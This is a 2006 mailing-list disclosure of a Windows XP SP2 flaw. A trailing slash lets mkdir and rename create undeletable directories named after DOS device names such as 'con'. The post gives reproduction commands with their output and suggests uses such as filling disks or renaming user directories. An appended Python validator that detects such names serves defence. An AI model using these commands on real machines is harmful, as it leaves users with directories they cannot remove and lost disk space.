Date: Mon May  1 17:24:56 2006
From: kulikk at monstrum.org (Klaudiusz Kulik)
Subject: DOS device name handling

    Hi.

* Overview:
A vulnerability exists in Windows XP SP2 (others may also be affected),
probably due to an error in the handling of special DOS device names.
In March 2000 Microsoft patched a similar problem in Windows 98:
http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4C6FD7E5-A66E-4A08-B782-2A64C77B95B6

* Environment:
I tried this on Polish Windows XP SP2 with the latest patches. Command outputs
are translated into English, so they are not identical to those in the English
version of XP.

* Description:
Using simple mkdir and rename commands it is possible to make a directory
structure which then cannot be removed from disk without special, third
party tools.
Because even an empty directory occupies some amount of disk space, this
vulnerability may be used against a user's machine by creating millions
of prepared, non-erasable directories. Another scenario may be renaming
a system or user's directory to an invalid name.

* Details:
In theory, Windows does not allow programs to create a directory containing
special DOS device names (e.g. CON, LPT1, COM1, PRN). By simply adding
a slash '/' character at the end of the directory name, that protection fails.

* Example:
Assume we are in the root of drive C:

Creating...
mkdir "/foo/foo/foo/foo"

Valid directory structure C:\foo\foo\foo\foo created.

... and renaming:
cd \foo\foo\foo
rename "foo" "con/"
cd ..
rename "foo" "con/"
cd ..
rename "foo" "con/"
cd ..
rename "foo" "con/"
C:\

Now directory structure is:
C:\con\con\con\con

Please note that this is a one-way operation. Renaming from "con/" or
"con" to "foo" does not work. However, if the directory has only one
level (C:\con) and is empty or contains "normal" entries, it is
possible to remove it.


Now, let's try to browse:

C:\cd "con"
System nie może odnaleźć określonej ścieżki.
[System can not find appropriate path.]
C:\cd "con/"
Nazwa katalogu jest nieprawidłowa.
[Invalid directory name.]


Let's try to rename:

C:\rename "con" "foo"
System nie może odnaleźć określonej ścieżki.
[System can not find appropriate path.]
C:\rename "con/" "foo"
Nie można odnaleźć określonego pliku.
[Could not find appropriate file.]


And finally - removing:

C:\>rmdir /S "con/"
con/, Czy na pewno (T/N)? t
[Are You sure (Y/N)?]
con/\con\con\con\con - Nie można odnaleźć określonego pliku.
con/\con\con\con - Nie można odnaleźć określonego pliku.
con/\con\con - Nie można odnaleźć określonego pliku.
con/\con - Nie można odnaleźć określonego pliku.
[Could not find appropriate file.]

Directory exists.

C:\erase /S /Q "con"
Nie można odnaleźć \\.\con.
[Could not find \\.\con.]

Please note a strange path.

C:\erase /S /Q "con/"

C:\
Directory *still* exists.

Windows Explorer can browse the directory, but renaming or removing fails.
It looks like there is no simple way to remove C:\con from a disk.

-- 
K.
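
Added example (not part of the original post): a name validator that normalises a path component before comparing it with the reserved DOS device names, so a trailing slash as in "con/" no longer slips past, plus a helper to audit existing paths. naive_is_reserved() is an assumed model of a raw string comparison, not Windows' own code; all function names and sample inputs are constructed for illustration.

```python
import re

# Reserved DOS device names per the documented Windows naming rules;
# the post lists CON, LPT1, COM1 and PRN as examples.
RESERVED = {"CON", "PRN", "AUX", "NUL"} | {
    f"{prefix}{n}" for prefix in ("COM", "LPT") for n in range(1, 10)
}


def naive_is_reserved(name):
    """Assumed model of a filter that compares the raw string only."""
    return name.upper() in RESERVED


def is_reserved(component):
    """Normalise one path component, then compare with the device list."""
    # Trailing separators, spaces and dots are what let "con/" get through.
    base = component.rstrip("/\\ .")
    # A device name followed by an extension ("con.txt") is still the device.
    base = base.split(".", 1)[0].rstrip(" ")
    return base.upper() in RESERVED


def reserved_components(path):
    """Return every component of a path that resolves to a device name."""
    parts = [p for p in re.split(r"[\\/]+", path) if p]
    return [
        p for p in parts
        if not re.fullmatch(r"[A-Za-z]:", p) and is_reserved(p)  # skip "C:"
    ]


if __name__ == "__main__":
    # Constructed sample names, including the "con/" form from the post.
    for name in ["foo", "con", "con/", "CON.txt", "lpt1 ", "console", "com10"]:
        print(f"{name!r:12} naive={naive_is_reserved(name)!s:6} "
              f"normalised={is_reserved(name)}")
    # Constructed sample paths for an audit of an existing tree listing.
    for path in [r"C:\foo\foo\foo\foo", r"C:\con\con\con\con"]:
        print(path, "->", reserved_components(path))
```
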
